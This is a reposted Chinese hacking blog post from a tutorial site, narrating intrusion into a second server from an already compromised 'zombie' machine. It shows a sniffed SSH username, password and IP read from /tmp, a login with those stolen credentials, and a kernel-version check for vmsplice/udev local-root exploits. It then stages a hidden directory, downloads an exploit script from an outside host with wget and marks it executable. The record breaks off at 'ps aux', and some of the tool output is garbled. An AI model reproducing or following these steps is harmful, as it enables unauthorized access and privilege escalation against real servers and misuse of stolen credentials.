盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

我的一台linux肉鸡的容易手工入侵检测过程

时间:2023/8/29作者:未知来源:盘绰网教程人气:


[摘要]by:vitter blog:blog.securitycn.net今天发现一台肉鸡上某人的ssh连到另外一台服务器上, 记录下了密码。 [root@mail ~]# cat /tmp/sshp...

by:vitter

blog:blog.securitycn.net

今天发现一台肉鸡上某人的ssh连到另外一台服务器上, 记录下了密码。

[root@mail ~]# cat /tmp/sshpswd

ldc:sle823jfsGs@222.222.66.11

直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11

ldc@222.222.66.11's password:

Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200

[ldc@localhost ldc]$ cat /etc/issue

Red Hat Enterprise Linux Server release 5 (Tikanga)

Kernel \r on an \m

[ldc@localhost ldc]$ uname -a

Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核, vmsplice的local root应该可以的, 不过测试了下, 机器挂了, 换udev的好了。

[ldc@localhost ldc]$ mkdir .v

[ldc@localhost ldc]$ cd .v

[ldc@localhost .v]$ wget http://211.100.50.70/u.sh

--13:21:09--  http://211.100.50.70/u.sh

Connecting to 211.100.50.70:80... 宸茶繛鎺ャ€

宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK

闀垮害锛?366 (3.3K) [application/x-sh]

Saving t `u.sh'

100%[===========================================================================================>] 3,366       --.-K/s   in 0.04s 

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls

r00t    r00t.c  u.sh

[ldc@localhost .v]$ chmod +x u.sh

[ldc@localhost .v]$ cat /proc/net/netlink

sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks

f69f8800 0   2486   00000111 0        0        00000000 2

f7fdae00 0   0      00000000 0        0        00000000 2

c2132200 6   0      00000000 0        0        00000000 2

f6a57a00 7   2143   00000001 0        0        00000000 2

f7caf000 7   0      00000000 0        0        00000000 2

f6a0be00 9   2143   00000000 0        0        00000000 2

f6a61200 9   1996   00000000 0        0        00000000 2

f7de1c00 9   0      00000000 0        0        00000000 2

f7d6ca00 10  0      00000000 0        0        00000000 2

f7fb3200 11  0      00000000 0        0        00000000 2

c2154200 15  476    ffffffff 0        0        00000000 2

f7fdac00 15  0      00000000 0        0        00000000 2

f7fb3000 16  0      00000000 0        0        00000000 2

c21cde00 18  0      00000000 0        0        00000000 2

[ldc@localhost .v]$ ps aux

关键词:  我的一台linux肉鸡的容易手工入侵检测过程





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版